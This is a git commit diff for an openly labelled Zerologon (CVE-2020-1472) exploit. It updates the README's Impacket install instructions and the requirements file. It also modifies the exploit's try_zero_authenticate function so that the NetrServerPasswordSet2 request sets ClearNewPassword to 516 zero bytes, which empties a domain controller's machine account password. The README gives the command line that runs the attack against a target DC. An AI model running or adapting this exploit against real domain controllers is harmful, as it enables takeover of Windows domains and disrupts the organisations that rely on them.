Handle the impacket ClearNewPassword changes
This commit is contained in:
parent
b1ad966d60
commit
05ba66e088
|
@ -2,7 +2,7 @@
|
|||
|
||||
Exploit code based on https://www.secura.com/blog/zero-logon and https://github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc.
|
||||
|
||||
To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3 or newer. Then, do:
|
||||
To exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/b867b21 or newer. Then, do:
|
||||
|
||||
```
|
||||
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR
|
||||
|
|
|
@ -4,7 +4,7 @@ cryptography==3.1
|
|||
dnspython==2.0.0
|
||||
Flask==1.1.2
|
||||
future==0.18.2
|
||||
#impacket==0.9.21 # install impacket from https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce2adde3
|
||||
#impacket==0.9.21 https://github.com/SecureAuthCorp/impacket/commit/b867b21
|
||||
itsdangerous==1.1.0
|
||||
Jinja2==2.11.2
|
||||
ldap3==2.8
|
||||
|
|
|
@ -90,9 +90,7 @@ def try_zero_authenticate(dc_handle, dc_ip, target_computer):
|
|||
request["Authenticator"] = authenticator
|
||||
#request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
|
||||
#request['ReturnAuthenticator']['Timestamp'] = 0
|
||||
request["ClearNewPassword"] = nrpc.NL_TRUST_PASSWORD()
|
||||
request["ClearNewPassword"]["Buffer"] = b'\x00'*512
|
||||
request["ClearNewPassword"]["Length"] = 0 # It winds up being 516 bytes mentioned in the Secur whitepaper because this is 4 bytes
|
||||
request["ClearNewPassword"] = b"\x00"*516
|
||||
resp = rpc_con.request(request)
|
||||
resp.dump()
|
||||
|
||||
|
|
Loading…
Reference in New Issue